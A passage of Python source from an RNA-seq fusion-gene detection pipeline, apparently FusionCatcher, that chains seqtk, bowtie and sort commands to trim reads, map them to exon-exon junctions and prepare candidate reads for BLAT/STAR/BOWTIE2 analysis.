job.add('-L',options.trim_3end_keep,kind='parameter') job.add('-',kind='parameter') job.add('>',outdir('reads_filtered_psl_0.fq'),kind='output') job.run() step = options.trim_3end_keep - 2 * length_anchor_bowtie cuts = [c for c in range(0,max_len_reads,step) if c!=0 and c+options.trim_3end_keep<max_len_reads] if not cuts: job.link(outdir('reads_filtered_psl_0.fq'), outdir('reads_filtered_psl.fq'),temp_path=temp_flag) else: for i,c in enumerate(cuts): job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') job.add('-B',c+options.trim_3end_keep,kind='parameter') job.add('',outdir('reads_filtered_psl_temp22.fq'),kind='input') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') job.add('-E',options.trim_3end_keep,kind='parameter') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('seq',kind='parameter') job.add('-L',options.trim_3end_keep,kind='parameter') job.add('-',kind='parameter') job.add('>',outdir('reads_filtered_psl.fq.')+str(i),kind='output',dest_list='trim22') job.run() job.sink(job.trim22, outdir('trim22.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('trim22.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_psl_1.fq'),kind='output') job.run() job.clean(job.trim22,temp_path=temp_flag) job.add('cat',kind='program') job.add('',outdir('reads_filtered_psl_0.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_psl_1.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_psl.fq'),kind='output') job.run() job.clean(outdir('reads_filtered_psl_temp22.fq'),temp_path=temp_flag) if nucleotides_ee > options.limit_bowtie: if not candidates: job.add(_FC_+'split-fasta.py',kind='program') job.add('--size',outdir('exon-exon_junction_cut__nuc.txt'),kind='input') job.add('--seqs',outdir('exon-exon_junction_cut__seq.txt'),kind='input') job.add('--threshold',options.limit_bowtie,kind='parameter') 
job.add('-i',outdir('exon-exon_junction_cut.fa'),kind='input') job.add('-o',outdir('exon-exon_junction_cut_split.fa'),kind='output') job.run() parts = [el.strip() for el in file(outdir('exon-exon_junction_cut_split.fa'),'r').readlines()] for i,part in enumerate(parts): if not candidates: job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') job.add('',part,kind='input') job.add('',part+'_dir/',kind='output') job.run() job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1000',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(os.path.join(part+'_dir','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq.'+str(i)),kind='output',dest_list='exonexon22_un') # here is the result job.add('--tryhard',kind='parameter') job.add('',part+'_dir/',kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_psl.fq'),kind='input',temp_path=temp_flag) job.add('2>',outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map22.stdout.txt.'+str(i)),kind='output',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('-t',"'\t'",kind='parameter') job.add('-k','3,3',kind='parameter') job.add('>',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref22.map.'+str(i)),kind='output',dest_list='exonexon22') job.run() job.clean(outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map22.stdout.txt.'+str(i)),temp_path=temp_flag) if job.iff(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq.'+str(i))),id="###reads_fnmgnmteef22.fq."+str(i)+"###"): job.add('touch',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq.'+str(i)),kind='output') job.run() job.sink(job.exonexon22, outdir('exonexon22.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('exonexon22.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref22.map'),kind='output') job.run() job.clean(job.exonexon22,temp_path=temp_flag) job.sink(job.exonexon22_un, outdir('exonexon22_un.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('exonexon22_un.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq'),kind='output') job.run() job.clean(job.exonexon22_un,temp_path=temp_flag) else: if not candidates: job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') 
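# NOTE (explanatory, assuming standard bowtie-build semantics): the index tuning
# flags just below trade index size for lookup speed: '--offrate 1' marks every
# 2^1 rows of the Burrows-Wheeler matrix (instead of the default 2^5), which
# enlarges the index but speeds up locating alignment positions, while
# '--ftabchars 5' shrinks the initial lookup table from 4^10 to 4^5 entries,
# keeping memory modest for these small ad-hoc indexes.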
job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') job.add('',outdir('exon-exon_junction_cut.fa'),kind='input') job.add('',outdir('exon-exon_fusion-genes/'),kind='output') job.run() job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1000',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(outdir('exon-exon_fusion-genes','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq'),kind='output') # here is the result job.add('--tryhard',kind='parameter') job.add('',outdir('exon-exon_fusion-genes/'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_psl.fq'),kind='input',temp_path=temp_flag) job.add('2>',outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map22.stdout.txt'),kind='output',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('-t',"'\t'",kind='parameter') job.add('-k','3,3',kind='parameter') job.add('>',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref22.map'),kind='output') job.run() job.clean(outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map22.stdout.txt'),temp_path=temp_flag) if job.iff(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq')),id="###reads_fnmgnmteef22.fq###"): job.add('touch',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq'),kind='output') job.run() if job.iff(empty(outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref.map')),id="###reads-mapped-ref.map###"): job.link(outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref22.map'), outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_big.map'), temp_path=temp_flag) else: job.add('cat',kind='program') job.add('',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref.map'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref22.map'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('-t',"'\t'",kind='parameter') job.add('-k','3,3',kind='parameter') job.add('-k','1,1',kind='parameter') job.add('>',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_big.map'),kind='output') job.run() # this fixes a bug for options.trim-psl if 
options.trim_psl: job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big.fq'), temp_path=temp_flag) job.clean(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq'),temp_path=temp_flag) else: job.clean(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'),temp_path=temp_flag) # most of the time the reads go through this branch job.add(_SK_+'seqtk',kind='program') # get rid of the paired reads which support the fusion job.add('subseq',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_transcriptome22.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big_.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk>")) # remove the mapped reads which may look unmapped when the trimming has happened job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f','1',kind='parameter') job.add('',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_big.map'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('>',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_big.txt'),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('-e',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big_.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_big.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big.fq'),kind='output') job.run() # job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final22.fq'), # outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big.fq'), # temp_path=temp_flag) if candidates or double_bowtie: # continuing the original workflow # # more filtering -- remove the reads from the exon-exon junctions whose # paired read maps on a totally different gene than the two genes # involved in the exon-exon junction job.add(_FC_+'remove_reads_exon_exon_map.py',kind='program') if not options.all_reads_junction: job.add('--only_pairs',kind='parameter') job.add('--input_exon_exon',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_big.map'),kind='input',temp_path=temp_flag) job.add('--input_transcriptome', outdir('reads_filtered_transcriptome_sorted-read_end_important.map'), kind = 'input', temp_path = 'no' if (((not options.skip_blat) or (not options.skip_star) or (not options.skip_bowtie2)) and (not options.all_reads_junction)) else temp_flag)
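# NOTE (explanatory): the transcriptome mappings passed above tell, for each
# junction-spanning read, on which gene its mate maps; with '--only_pairs'
# (i.e. unless options.all_reads_junction is set) a junction read is kept
# only when its mate maps on one of the two genes forming that junction.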
job.add('--output',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_filtered.map'),kind='output') job.run() # analyze the exon-exon mappings job.add(_FC_+'analyze_exon-exon_mappings.py',kind='program') job.add('--input',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_filtered.map'),kind='input',temp_path=temp_flag) job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input') job.add('--output',outdir('candidate_fusion-genes_exon-exon-junctions_summary.txt'),kind='output') job.add('--output_henrik',outdir('candidate_fusion-genes_exon-exon-junctions_reads-positions.txt'),kind='output') job.run() # summary the exon-exon mappings job.add(_FC_+'build_report_fusions_map.py',kind='program') job.add('--suporting_unique_reads',spanning_reads_bowtie,kind='parameter') job.add('--anchor2',length_anchor2,kind='parameter') job.add('--input_exons',datadir('exons.txt'),kind='input') job.add('--input_candidate_fusion_genes',outdir('candidate_fusion-genes_further.txt'),kind='input') job.add('--input_fusion_summary',outdir('candidate_fusion-genes_exon-exon-junctions_summary.txt'),kind='input',temp_path=temp_flag) job.add('--input_fusion_summary_more',outdir('candidate_fusion-genes_exon-exon-junctions_reads-positions.txt'),kind='input',temp_path=temp_flag) job.add('--input_candidate_fusions_missing_mates',outdir('candidate_fusion-genes_missing_mates.txt'),kind='input',temp_path=temp_flag) job.add('--input_unmapped_reads',outdir('reads_ids_unmapped.txt'),kind='input') job.add('--input_fasta_juncs',outdir('exon-exon_junction_cut.fa'),kind='input',temp_path=temp_flag) # if options.reads_preliminary_fusions: # job.add('--output_all_candidate_fusion_genes_reads',outdir('pre-fusion'),kind='output') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') if (not options.skip_blat) or (not options.skip_star) or (not options.skip_bowtie2): job.add('--input_fastq',outdir('original_important.fq.gz'),kind='input') # needed for BLAT later job.add('--input_candidate_fusion_genes_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input') else: job.add('--input_fastq',outdir('original_important.fq.gz'),kind='input',temp_path=temp_flag if options.skip_spotlight else 'no') job.add('--input_candidate_fusion_genes_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input',temp_path=temp_flag if options.skip_spotlight else 'no') if options.psl_visualization and not empty(datadir('genome.2bit')): job.add('--input_genome_2bit',datadir('genome.2bit'),kind='input') job.add('--psl_alignment_type','web',kind='parameter') if _BT_: job.add('--blat-dir',_BT_,kind='parameter') if options.sam_visualization: job.add('--input_genome_bowtie2',datadir('genome_index2/index'),kind='input') job.add('--sam_alignment','20',kind='parameter') job.add('--threads',options.processes,kind='parameter') if _B2_: job.add('--bowtie2-dir',_B2_,kind='parameter') if options.assembly: job.add('--velvet',kind='parameter') if _VT_: job.add('--velvet-dir',_VT_,kind='parameter') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BOWTIE.txt'),kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BOWTIE.zip'),kind='output') job.run() ################################################################################## ################################################################################## ################################################################################## # Find fusion genes using BLAT/STAR/BOWTIE2 
################################################################################## ################################################################################## ################################################################################## ################################################################################## if ((not options.skip_blat) or (not options.skip_star) or (not options.skip_bowtie2)) and (candidates or double_bowtie): # generate the gene-gene junctions in FASTA format job.add(_FC_+'generate_gene-gene_junctions.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_exon-exon.txt'),kind='input',temp_path=temp_flag) job.add('--input_database',datadir('genes.fa'),kind='input') job.add('--input_exons',datadir('exons.txt'),kind='input') job.add('--reverse',kind='parameter') job.add('--longest',outdir('gene-gene_longest.txt'),kind='output') job.add('--output',outdir('gene-gene.fa'),kind='output') job.add('--output_genes',outdir('gene-gene_unique.fa'),kind='output') job.add('--output_genes_count_seq',outdir('gene-gene_unique__seq.txt'),kind='output') job.add('--output_genes_count_nuc',outdir('gene-gene_unique__nuc.txt'),kind='output') job.run() nucleotides_ggu = int(float(file(outdir('gene-gene_unique__nuc.txt'),'r').readline().strip())) # job.add('du',kind='program') # job.add('-b',outdir('gene-gene.fa'),kind='input') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('cut',kind='parameter') # job.add('-f','1',kind='parameter') # job.add('>',outdir('gene-gene__nuc.txt'),kind='output') # job.run() # get the length of the FASTA file job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-v','"^>"',kind='parameter') job.add('',outdir('gene-gene.fa'),kind='input') job.add('|',kind='parameter') job.add('wc',kind='parameter') job.add('|',kind='parameter') job.add('awk',kind='parameter') job.add("'{print $3-$1}'",kind='parameter') job.add('>',outdir('gene-gene__nuc.txt'),kind='output') job.run() nucleotides_gg = int(float(file(outdir('gene-gene__nuc.txt'),'r').readline().strip())) job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-c',kind='parameter') job.add("'^>'",outdir('gene-gene.fa'),kind='input') job.add('>',outdir('gene-gene__seq.txt'),kind='output') job.run(successful_exit_status=(0,1)) sequences_gg = int(float(file(outdir('gene-gene__seq.txt'),'r').readline().strip())) if options.trim_psl: # link job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl.fq'), temp_path = temp_flag) else: # job.add('extract_reads_ids.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.txt'),kind='output') # job.run() # extract reads ids job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("'NR%4==1 {print substr($0,2)}'",outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big.fq'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: 
job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.txt'),kind='output') job.run() # extract the short reads which mapped on the transcriptome and do not map on genome # job.add('extract_short_reads.py',kind='program') # job.add('--input',outdir('original.fq.gz'),kind='input') # job.add('--list',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.txt'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_original.fq'),kind='output') # job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') # job.run(error_message = ("If this fails due to a memory error then lowering the "+ # "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ # "of FusionCatcher and running it again might help!")) if min(max_len_reads,options.trim_psl_3end_keep) > min_len_reads : # add also the reads of the paired reads which support the candidate fusion genes (some of them might overlap the fusion junction) job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome2.txt'),kind='output') job.run() else: job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.txt'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome2.txt'), temp_path = temp_flag) if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',outdir('original_important.fq.gz'),kind='input') job.add('--list',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome2.txt'),kind='input') job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_temp.fq'),kind='output') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. 
This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('original_important.fq.gz'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome2.txt'),kind='input') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_temp.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) elif options.split_seqtk_subseq > 1: job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('original_important.fq.gz'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome2.txt'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_temp.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) job.clean(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome2.txt'),temp_path=temp_flag) # link #job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_original.fq'), # outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl.fq'), # temp_path=temp_flag) job.add(_FC_+'fastq_b2n.py',kind='program') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl_temp.fq'),kind='input',temp_path=temp_flag) job.add('--replacement','A',kind='parameter') job.add('--ambiguous',kind='parameter') job.add('--sanger',kind='parameter') job.add('--threshold',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file = 'yes') job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl.fq'),kind='output') job.run() job.add(_FC_+'trim_poly_tails.py',kind='program') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl.fq'),kind='input',temp_path=temp_flag) job.add('--repeats',length_anchor_minimum - 1,kind='parameter') #job.add('--skip_reads',kind='parameter') #job.add('--replace',kind='parameter') # test eml4 job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus_b.fq'),kind='output') job.run() # clip the low quality ends job.add(_FC_+'clip_quality.py',kind='program') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('-t',options.trim_quality,kind='parameter') # below Q5 trimming starts job.add('--score-type','sanger',kind='parameter') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus_b.fq'),kind='input',temp_path=temp_flag) job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus_temp.fq'),kind='output') job.run() if options.trim_psl_5end and options.trim_5end > 0: # trim 5 
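# NOTE (explanatory, assuming upstream seqtk trimfq semantics for the bundled
# build): '-b N' drops the first N bases of every read and '-l 1' lowers the
# minimum retained length to 1 bp so the requested trimming is applied in
# full; reads that become too short are discarded afterwards by the
# 'seqtk seq -L' step below.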
job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') job.add('-b',options.trim_5end,kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus_temp.fq'),kind='input', temp_path='no') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus.fq'),kind='output') job.run() else: job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus_temp.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus.fq'), temp_path = temp_flag) # remove reads shorter than a given threshold # job.add('remove_shorter_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus.fq'),kind='input',temp_path=temp_flag) # job.add('--threshold',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-p.fq'),kind='output') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-L',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-plus.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-p.fq'),kind='output') job.run() if job.iff(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-p.fq')), id = "#reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-p.fq#"): candidates = False t = ["="*80, "WARNING: No candidate fusion genes have been found using BLAT/STAR/BOWTIE2!", "="*80 ] job.write(t, stderr=True) if job.run(): file(info_file,'a').writelines([el.rstrip('\r\n')+'\n' for el in [""]+t+[""]]) if options.keep_unmapped_reads: # job.add('echo',kind='program') # job.add('-n','""',kind='parameter') # job.add('>',outdir('unmapped-reads.fq.gz'), kind='output') # job.run() job.add('touch',kind='program') job.add('',outdir('unmapped-reads.fq.gz'), kind='output') job.run() # summary the exon-exon mappings # just get the header if not options.skip_blat: job.add(_FC_+'build_report_fusions_map.py',kind='program') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BLAT.txt'), kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BLAT.zip'), kind='output') job.run() if not options.skip_star: job.add(_FC_+'build_report_fusions_map.py',kind='program') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_STAR.txt'), kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_STAR.zip'), kind='output') job.run() if not options.skip_bowtie2: job.add(_FC_+'build_report_fusions_map.py',kind='program') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BOWTIE2.txt'), kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BOWTIE2.zip'), kind='output') job.run() # if not options.skip_bwa: # job.add(_FC_+'build_report_fusions_map.py',kind='program') # job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BWA.txt'), kind='output') # job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BWA.zip'), kind='output') # job.run() else: job.add('printf',kind='program') job.add(('"\nCounts of reads before BLAT/STAR/BOWTIE2 alignment:\n'+ 
'----------------------------------------------------------\n"'),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-p.fq'),kind='input') job.add('|',kind='parameter') job.add("echo $((`wc -l`/4))",kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() # trim the reads given as input to BLAT input_file = outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-p.fq') output_file = outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq') if options.trim_psl_3end_keep > 25 and ((options.trim_psl_3end_keep < max_len_reads and (not options.trim_psl)) or (options.trim_psl and min_len_reads > options.trim_psl_3end_keep)): # trim from 3-end to have the reads all the same length # job.add('trim_reads.py',kind='program') # job.add('--input',input_file,kind='input',temp_path=temp_flag) # job.add('--output',output_file,kind='output') # job.add('--trim_end','3',kind='parameter') # job.add('--final_size',options.trim_psl_3end_keep,kind='parameter') # job.run() # # original # job.add('seqtk',kind='program') # job.add('trimfq',kind='parameter') # job.add('-l','1',kind='parameter') # #job.add('-q','0',kind='parameter') # job.add('-B',options.trim_psl_3end_keep,kind='parameter') # job.add('',input_file,kind='input', temp_path=temp_flag) # job.add('>',output_file,kind='output') # job.run() # try to trim only the unmapped read (do not trim the paired reads supporting the fusions) if not options.split_seqtk_subseq: 